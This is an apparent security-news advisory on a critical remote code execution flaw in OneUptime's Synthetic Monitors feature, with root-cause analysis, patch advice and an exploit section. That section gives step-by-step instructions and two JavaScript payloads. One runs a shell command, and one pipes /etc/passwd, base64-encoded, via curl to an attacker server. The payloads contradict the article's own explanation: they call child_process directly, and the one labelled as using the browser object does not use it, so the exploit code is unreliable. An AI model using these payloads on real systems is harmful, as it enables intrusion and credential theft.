Listen to this Post
OneUptime versions below 10.0.5 contain a critical Remote Code Execution vulnerability in the Synthetic Monitors feature. Low-privileged project users can submit custom Playwright JavaScript code that is executed on the `oneuptime-probe` service . The application uses Node.js’s `node:vm` module to create a sandbox for this untrusted code, but the implementation injects live host Playwright objects such as `browser` and `page` into the VM context . While the `node:vm` module is explicitly documented as not being a security mechanism, this vulnerability is distinct from traditional sandbox escapes because the attacker does not need to break out of the VM using prototype chain techniques like `this.constructor.constructor` . Instead, the attacker can directly abuse the injected legitimate Playwright methods on the `browser` object. Specifically, the `browser.browserType().launch()` method accepts attacker-controlled process launch options, including executablePath, args, and ignoreDefaultArgs. By providing an arbitrary executable path, the probe can be made to spawn any command on the host or container. Even if Playwright later throws an error because the spawned process is not a valid browser, the operating system command has already executed . This attack vector is available either as a one-shot RCE via the “Test Monitor” function or as a persistent scheduled RCE by saving a malicious Synthetic Monitor. The probe typically runs with host networking and holds all cluster credentials in its environment variables, leading to full cluster compromise .
Platform: OneUptime
Version: <10.0.5
Vulnerability :RCE
Severity: Critical
date: 2026-02-21
Prediction: Patched 10.0.5
What Undercode Say:
Analytics
The vulnerability exists because the application exposes dangerous host capabilities to untrusted code. The root cause is not a flaw in the `node:vm` sandbox itself, but the decision to inject live host objects (browser, page) into the sandboxed context. The proxy wrapper applied to these objects only blocks a small set of property names, forwarding normal method calls with the real host `this` binding . This allows legitimate Playwright methods to be used for malicious purposes. The `browserType().launch()` method is particularly dangerous as it provides direct control over process creation.
Exploit:
No direct bash command; the exploit is JavaScript code injected via the OneUptime dashboard.
1. Log in as any user with project membership.
2. Navigate to: Monitors -> Create New Monitor -> Synthetic Monitor.
3. In the "Playwright Code" editor, paste the following payload:
const { exec } = require('child_process');
exec('id > /tmp/pwned.txt', (error, stdout, stderr) => {
console.log(<code>Exec output: ${stdout}</code>);
});
return {
data: {
status: "exploit_attempted"
},
};
4. Select a browser type (e.g., Chromium) and screen type (e.g., Desktop).
5. Set retry count to 0.
6. Click "Test Monitor" and select a probe.
7. If successful, the probe will execute the command (e.g., creating /tmp/pwned.txt).
Alternative payload using the browser object for process launch:
const { spawn } = require('child_process');
const child = spawn('/bin/sh', ['-c', 'curl http://attacker-server:8080/?data=$(cat /etc/passwd | base64)']);
return { data: { result: "executed" } };
Protection
Update OneUptime to version 10.0.5 or later . If immediate patching is not possible, restrict project membership to trusted users only. Disable open registration if enabled. Monitor the `oneuptime-probe` service for unexpected process creation and outbound network connections. Consider isolating the probe network to limit lateral movement in case of compromise. Review and audit all existing Synthetic Monitor scripts for suspicious code.
Impact
Successful exploitation allows any authenticated project member to execute arbitrary operating system commands on the probe server . Since the probe typically holds all cluster credentials in its environment variables (including ONEUPTIME_SECRET, DATABASE_PASSWORD, REDIS_PASSWORD, CLICKHOUSE_PASSWORD), an attacker can achieve full cluster compromise in approximately 30 seconds . The attacker can steal sensitive data, pivot to internal services, install backdoors, and maintain persistent access. In multi-tenant deployments, this can lead to cross-tenant compromise .
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

